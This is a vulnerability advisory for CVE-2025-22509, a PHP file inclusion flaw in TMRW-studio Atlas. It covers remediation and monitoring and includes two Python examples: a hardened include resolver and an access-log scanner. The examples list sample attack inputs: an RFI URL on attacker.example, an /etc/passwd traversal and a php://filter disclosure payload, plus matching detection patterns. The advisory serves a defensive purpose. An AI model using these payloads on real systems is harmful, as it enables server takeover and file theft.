CVE-2025-22509

TMRW-studio · TMRW-studio Atlas


Executive summary

A critical vulnerability, identified as CVE-2025-22509, exists in the TMRW-studio Atlas software. The flaw lets a remote, unauthenticated attacker make the application include and execute a PHP file from an attacker-controlled location, which can lead to a complete takeover of the affected server. Immediate patching is required to prevent data breaches, service disruption, and further network compromise.

Vulnerability

The vulnerability is an Improper Control of a Filename for an Include/Require Statement in a PHP Program (CWE-98), commonly known as Remote File Inclusion (RFI) or, in its local form, Local File Inclusion (LFI). The application uses user-supplied input to build the file path passed to a PHP include or require statement without properly validating it. A remote, unauthenticated attacker can exploit this by crafting a request whose parameter points at a malicious PHP file hosted on an attacker-controlled server; PHP's HTTP stream wrapper fetches that file and the interpreter executes it with the permissions of the web server process. Two caveats matter for triage: the remote variant only works when the PHP directive allow_url_include is enabled (it has defaulted to Off since PHP 5.2.0), and where it is disabled the same flaw still permits inclusion of local files (via path traversal, PHP stream wrappers such as php://filter for source disclosure, or attacker-influenced files such as logs or uploads), so the vulnerability remains serious either way.
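To make the flaw concrete, the following is an added Python example, not Atlas' own code (the advisory does not show the affected source). It models the broken pattern next to a hardened one: the vulnerable resolver concatenates the request value into the include path, while the hardened resolver only ever treats the value as a key into an allowlist and rejects URL schemes, PHP stream wrappers and null bytes before touching the filesystem. The install path, page table and attacker inputs are constructed assumptions.

```python
import os
import re
from urllib.parse import unquote

# Assumed install path and page table; Atlas' real layout is not on the page.
BASE_DIR = "/var/www/atlas/pages"
PAGES = {"home": "home.php", "about": "about.php", "contact": "contact.php"}

# Anything that looks like "scheme:" at the start of the value: http://, ftp://,
# and PHP stream wrappers such as php://, data:, expect://, phar://.
SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*:")


def resolve_vulnerable(page: str) -> str:
    """The flawed pattern: the request value goes straight into the include path.

    Equivalent to PHP  include($_GET['page'] . '.php');  (generic illustration,
    not Atlas' source). With allow_url_include=On, a value such as
    http://attacker.example/shell makes PHP fetch and execute
    http://attacker.example/shell.php on the server.
    """
    return page + ".php"


def resolve_hardened(page: str) -> str:
    """Return the absolute path to include, or raise ValueError.

    The request value is only a key into an allowlist; it never becomes part of
    the path itself, so URLs, wrappers and traversal cannot reach the include.
    """
    value = unquote(page)  # inspect the decoded form, as PHP would use it
    if "\x00" in value:
        raise ValueError("null byte in page parameter")
    if SCHEME_RE.match(value):
        raise ValueError("scheme or stream wrapper in page parameter")
    if value not in PAGES:
        raise ValueError(f"unknown page {value!r}")
    base = os.path.realpath(BASE_DIR)
    full = os.path.realpath(os.path.join(base, PAGES[value]))
    # Defence in depth: even if the allowlist table is later edited carelessly,
    # refuse anything that resolves outside BASE_DIR.
    if os.path.commonpath([base, full]) != base:
        raise ValueError("resolved path escapes base directory")
    return full


def accepts(page: str) -> bool:
    """True if the hardened resolver would include something for this value."""
    try:
        resolve_hardened(page)
        return True
    except ValueError:
        return False


# Constructed attacker inputs of the kinds the advisory describes.
ATTACKER_INPUTS = [
    "http://attacker.example/shell",                       # RFI: remote code via allow_url_include
    "../../../../etc/passwd%00",                           # LFI with null-byte truncation (old PHP)
    "php://filter/convert.base64-encode/resource=config",  # source disclosure via stream wrapper
]

if __name__ == "__main__":
    for value in ["home"] + ATTACKER_INPUTS:
        print(f"{value!r:55} vulnerable -> {resolve_vulnerable(value)!r}")
        print(f"{'':55} hardened   -> {'accepted' if accepts(value) else 'rejected'}")
```

The point of the allowlist design is that no amount of input sanitisation is needed afterwards: the user never controls any bytes of the path. Denylisting strings such as "http://" or "../" is the approach that keeps failing, because of case variations, double encoding and wrappers the filter did not anticipate.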

Business impact

This vulnerability is rated as critical severity with a CVSS score of 9.8. Successful exploitation could lead to a complete compromise of the server hosting the TMRW-studio Atlas application. Potential consequences include theft of sensitive corporate or customer data, deployment of ransomware, disruption of business operations, and the use of the compromised server as a pivot point to attack other internal systems. The potential for significant financial, reputational, and operational damage is extremely high.

Remediation

Immediate Action: Update the TMRW-studio Atlas software to the latest vendor release. Version 2.1.0 and earlier are affected, so the fix is only present in a release later than 2.1.0; confirm the installed version after the upgrade. After patching, review web server access logs and system logs for signs of exploitation attempts or compromise that may have occurred before the patch was applied.

Proactive Monitoring: Monitor web server access logs for request parameters that contain absolute URLs (http://, https://, ftp://), PHP stream wrappers (php://, data:, expect://, phar://) or path traversal sequences (e.g., ../..). URL-decode parameter values before matching, since payloads are routinely percent-encoded or double-encoded. Note that standard access logs record only the request line, so payloads sent in POST bodies are invisible there; detecting those requires WAF or application-level logging. Scrutinize outbound network traffic from the Atlas server for connections to unusual or untrusted IP addresses, as a web server fetching a file from an unknown host is a strong indicator of a successful RFI. Implement file integrity monitoring on the application server to detect unauthorized file modifications.
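The following is an added Python example of the access-log triage described above; it is not Atlas' code and not a vendor-supplied detection. It parses combined-format log lines, decodes every query parameter (including double encoding), tags values that carry RFI/LFI indicators, and counts hits per client. The log lines are constructed, and the "page" parameter name is an assumption: the advisory does not name the vulnerable parameter.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed combined-format access-log lines (not real Atlas traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2025:12:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2025:12:00:02 +0000] "GET /index.php?page=http://198.51.100.9/s.txt HTTP/1.1" 200 210 "-" "curl/8.4.0"
203.0.113.7 - - [10/Mar/2025:12:00:03 +0000] "GET /index.php?page=..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1" 500 0 "-" "curl/8.4.0"
203.0.113.7 - - [10/Mar/2025:12:00:04 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=config HTTP/1.1" 200 3000 "-" "curl/8.4.0"
198.51.100.22 - - [10/Mar/2025:12:00:05 +0000] "GET /index.php?page=about&ref=https://example.org/ HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request target and status from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Indicator patterns applied to the fully decoded parameter value.
INDICATORS = {
    "remote_url": re.compile(r"^(?:https?|ftps?)://", re.I),
    "php_wrapper": re.compile(r"^(?:php|phar|zip|glob|expect|file)://|^data:", re.I),
    "traversal": re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)"),
    "null_byte": re.compile("\x00"),
}


def inspect_params(target: str) -> dict:
    """Map parameter name -> set of indicator labels found in its decoded value."""
    hits = {}
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        decoded = unquote(value)  # parse_qsl decoded once; this exposes %25-style double encoding
        found = {label for label, rx in INDICATORS.items() if rx.search(decoded)}
        if found:
            hits[name] = found
    return hits


def scan(log_text: str) -> list:
    """Return one finding per (line, parameter) that carries an indicator."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        for param, labels in inspect_params(m["target"]).items():
            findings.append({
                "line": lineno,
                "ip": m["ip"],
                "status": int(m["status"]),
                "param": param,
                "indicators": labels,
            })
    return findings


def offenders(findings: list, min_hits: int = 2) -> dict:
    """Client IPs with at least min_hits flagged requests, for prioritising review."""
    counts = Counter(f["ip"] for f in findings)
    return {ip: n for ip, n in counts.items() if n >= min_hits}


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for f in results:
        print(f"line {f['line']}: {f['ip']} param={f['param']} "
              f"{sorted(f['indicators'])} status={f['status']}")
    print("repeat offenders:", offenders(results))
```

A 200 status on a request flagged "remote_url" or "php_wrapper" deserves the most attention, since an error status usually means the include failed. The last sample line shows the noise this broad matching produces: a URL in a referrer-style parameter is flagged too. Once the vendor names the vulnerable parameter, restrict the check to that parameter to cut false positives.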

Compensating Controls: If immediate patching is not feasible, implement the following controls to mitigate risk:

  • Deploy a Web Application Firewall (WAF) with rulesets designed to detect and block RFI/LFI attack patterns; make sure the rules inspect URL-decoded parameter values and POST bodies, not just the raw request line.
  • In the server's php.ini configuration, disable allow_url_fopen and allow_url_include to prevent the PHP engine from including remote files. First check the running values (php -i or phpinfo()), since allow_url_include has been Off by default since PHP 5.2.0; and test the application afterwards, because turning off allow_url_fopen also breaks any legitimate code that fetches URLs with file_get_contents() or similar. Note that these directives do not prevent inclusion of local files, so they reduce but do not remove the risk.
  • Enforce strict file system permissions to limit the web server process's access to sensitive files outside of the web root directory, and consider setting open_basedir to confine the paths PHP may open to the application's own directories.

Exploitation status

Public Exploit Available: false

Analyst recommendation

Given the critical CVSS score of 9.8 and the fact that exploitation requires no authentication, this vulnerability represents a severe and immediate threat to the organization. We strongly recommend identifying all instances of TMRW-studio Atlas version 2.1.0 and earlier and patching them immediately. The absence of a public exploit at the time of writing should not lower the priority: file inclusion flaws are simple to exploit once the vulnerable parameter is known. Due to the high risk of complete system compromise, this remediation effort should be treated as the highest priority.